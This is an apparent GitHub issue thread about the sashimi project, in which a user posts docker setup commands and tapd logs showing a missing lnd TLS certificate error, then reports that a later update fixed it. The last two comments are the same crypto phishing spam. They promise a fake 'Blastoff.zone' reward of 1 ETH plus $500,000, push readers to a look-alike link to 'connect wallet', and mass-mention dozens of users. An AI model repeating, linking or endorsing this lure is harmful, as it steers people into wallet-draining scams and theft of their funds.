### ISSUE TITLE
unable to connect to lnd node: unable to get tls creds: couldn't find out if default lnd TLS cert at /home/tap/.lnd/tls.cert exists: stat /home/tap/.lnd/tls.cert

### ISSUE THREAD

**Issue by straumat** [davisv7/sashimi#1]
Hi, I start with a fresh Ubuntu 23.04, I installed docker and set the following rights:
```
sudo gpasswd -a $USER docker;newgrp docker
sudo chown $USER:docker /var/run/docker.sock
sudo usermod -aG docker $USER
```
Then, I install sashimi and run it:
```
git clone https://github.com/davisv7/sashimi
cd sashimi
docker-compose up
```

When starting, I get this in the logs: 
```
tapd    | adding user tap (1000:1000)
lnd     | adding user lnd (1000:1000)
tapd    | Running as tap user: tapd --lnd.host=lnd:10009
lnd     | Running as lnd user: lnd --externalip=lnd --tlsextradomain=lnd --tlsextradomain=my_network
tapd    | 2023-06-13 13:13:41.565 [WRN] CONF: open /home/tap/.tapd/tapd.conf: no such file or directory
tapd    | 2023-06-13 13:13:41.566 [INF] CONF: Generating TLS certificates...
tapd    | 2023-06-13 13:13:41.567 [INF] CONF: Done generating TLS certificates
tapd    | 2023-06-13 13:13:41.568 [INF] CONF: Attempting to establish connection to lnd...
tapd    | error creating server: unable to connect to lnd node: unable to get tls creds: couldn't find out if default lnd TLS cert at /home/tap/.lnd/tls.cert exists: stat /home/tap/.lnd/tls.cert: no such file or directory
```

and then, I keep on gettings this:
```
tapd    | 2023-06-13 13:13:47.320 [WRN] CONF: open /home/tap/.tapd/tapd.conf: no such file or directory
tapd    | 2023-06-13 13:13:47.320 [INF] CONF: Attempting to establish connection to lnd...
tapd    | error creating server: unable to connect to lnd node: unable to get tls creds: couldn't find out if default lnd TLS cert at /home/tap/.lnd/tls.cert exists: stat /home/tap/.lnd/tls.cert: no such file or directory
```

**Comment by straumat** [comment]
Works with latest update. Thanks!

**Comment by jorge-nascimento** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
Odysseus102, @Jerick26, @izayl, @fjccoin, @MakerRain, @tsujp, @senchabot-app, @law27, @i5hi, @skyking363, @seenevz, @lattesir, @jceb, @bizmindx, @nodejsjs, @daviddahl, @danielabrozzoni, @ch4ot1c, @JLH20, @martonp, @nicolasburtey, @pjhartout, @Damin-Lee, @codeincrypt, @killalau, @ugurakcil, @byrongibson, @Masssi, @andrewpmartinez, @GlenCooper, @gallenjohnson, @theoolee, @Qubeo, @hendrawd, @sudosoph, @PhillipBurrows, @psiofxt, @partyspy, @marioSilvestri3, @erosnol, @ScolDev, @gtonic, @jorishr, @sanbit, @alan7s, @7-------, @raphjaph, @salty-ivy, @WhiteZ81, @robtrevizani

**Comment by jorge-nascimento** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
0xbc21, @adamplansky, @mang000, @dnorth144, @shaddysignal, @nochiel, @toshmanuel, @delicacyyy, @mwfogleman, @positiveblue, @leroy-walton, @MrVaughan, @simonedimaria, @DerBitcoinSchwabe, @pereztechseattle, @konchunas, @smallswan399, @devitalio, @fzunino, @wainola, @pbishop16, @MrCorncob, @nikkaroraa, @alko89, @odp, @commaCees, @Sophiamer2002, @nickpizzo, @guenit, @nocturnalplace, @tbtommyb, @ligulfzhou, @darknet1127, @MR-B-80, @liuis, @Writech, @jonpierce, @taurrbond, @sharia-design, @sdesalas, @mohitrakhade20, @diop, @lvittor, @galderz, @wdavidturner, @haxshad, @madis, @GoishikMG, @eukddan, @satoshe
